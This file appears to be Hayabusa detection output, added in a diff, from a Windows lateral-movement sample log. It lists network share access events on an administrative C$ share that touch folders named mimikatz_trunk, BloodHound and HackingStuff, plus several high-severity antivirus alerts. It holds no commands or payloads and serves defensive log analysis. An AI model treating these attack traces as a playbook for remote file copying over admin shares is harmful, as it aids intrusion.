+2019-03-18 23:23:25.509 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\css | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.509 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\fonts | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.509 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\img | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.519 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\js | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.519 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\HackingStuff | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.519 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\HackingStuff\logs | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.529 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\mimikatz_trunk | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.529 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\mimikatz_trunk\Win32 | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.529 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\mimikatz_trunk\x64 | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.529 +09:00,PC01.example.corp,5145,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.529 +09:00,PC01.example.corp,5145,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.529 +09:00,PC01.example.corp,5145,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.539 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Documents | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.539 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Downloads | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.539 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Favorites | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.549 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Favorites\Links\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.549 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Favorites\Links for United States\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.549 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Favorites\Links | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.559 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Favorites\Links for United States | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.559 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Links | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.559 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Music | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.559 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Pictures | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.559 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Saved Games | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.559 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Searches | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.569 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Videos | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.569 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02 | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.569 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Contacts\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.569 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Desktop\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.569 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Documents\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.569 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Downloads\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.579 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Favorites\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.579 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Links\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.579 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Music\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.579 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Pictures\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.579 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Saved Games\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.579 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Searches\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.589 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Videos\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.589 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Contacts | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.589 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Desktop | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.589 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Desktop\mimikatz_trunk | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.589 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Desktop\mimikatz_trunk\Win32 | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.589 +09:00,PC01.example.corp,5145,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.589 +09:00,PC01.example.corp,5145,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.599 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Desktop\mimikatz_trunk\x64 | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.599 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Documents | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.599 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Downloads | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.599 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Favorites | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.599 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Favorites\Links\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.599 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Favorites\Links for United States\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.599 +09:00,PC01.example.corp,5145,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.609 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Favorites\Links | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.609 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Favorites\Links for United States | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.609 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Links | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.609 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Music | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.609 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Pictures | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.619 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Saved Games | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.619 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Searches | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.619 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Videos | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.619 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03 | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.619 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Contacts\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.619 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Desktop\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.619 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Documents\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.629 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Downloads\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.629 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Favorites\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
